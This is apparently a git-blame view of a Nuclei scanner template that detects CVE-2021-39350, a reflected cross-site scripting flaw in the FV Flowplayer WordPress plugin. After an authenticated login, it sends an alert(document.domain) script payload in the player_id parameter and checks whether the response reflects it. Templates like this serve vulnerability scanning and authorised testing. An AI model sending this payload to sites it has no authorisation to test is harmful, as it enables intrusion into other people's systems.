2022-01-25 08:31:13 +00:00
id : CVE-2021-39350
info :
2022-09-09 17:34:37 +00:00
name : FV Flowplayer Video Player WordPress plugin - Authenticated Cross-Site Scripting
2022-01-25 08:31:13 +00:00
author : gy741
severity : medium
2022-05-17 09:18:12 +00:00
description : The FV Flowplayer Video Player WordPress plugin is vulnerable to Reflected Cross-Site Scripting via the player_id parameter found in the ~/view/stats.php file which allows attackers to inject arbitrary web scripts in versions 7.5.0.727 - 7.5.2.727.
2022-01-25 08:31:13 +00:00
reference :
- https://wpscan.com/vulnerability/e9adc166-be7f-4066-a2c1-7926c6304fc9
- https://nvd.nist.gov/vuln/detail/CVE-2021-39350
2022-05-17 09:18:12 +00:00
- https://plugins.trac.wordpress.org/changeset/2580834/fv-wordpress-flowplayer/trunk/view/stats.php
- https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39350
2022-01-25 08:31:13 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2022-01-25 08:31:13 +00:00
cve-id : CVE-2021-39350
cwe-id : CWE-79
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:foliovision:fv_flowplayer_video_player:*:*:*:*:*:*:*:*
epss-score : 0.00139
2022-08-27 04:41:18 +00:00
tags : wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2022-01-25 08:31:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-01-25 11:38:01 +00:00
- raw :
- |
POST /wp-login.php HTTP/1.1
Host : {{Hostname}}
Origin : {{RootURL}}
Content-Type : application/x-www-form-urlencoded
Cookie : wordpress_test_cookie=WP%20Cookie%20check
2022-01-25 08:31:13 +00:00
2022-01-25 11:38:01 +00:00
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin.php?page=fv_player_stats&player_id=1</script><script>alert(document.domain)</script> HTTP/1.1
Host : {{Hostname}}
cookie-reuse : true
matchers-condition : and
2022-01-25 08:31:13 +00:00
matchers :
- type : word
part : body
2022-01-25 11:38:01 +00:00
words :
- "</script><script>alert(document.domain)</script>"
2022-04-29 15:09:54 +00:00
- "<h1>FV Player Stats</h1>"
condition : and
2022-01-25 11:38:01 +00:00
- type : word
part : header
words :
- text/html
- type : status
status :
- 200
2022-03-25 11:45:10 +00:00
# Enhanced by mp on 2022/03/23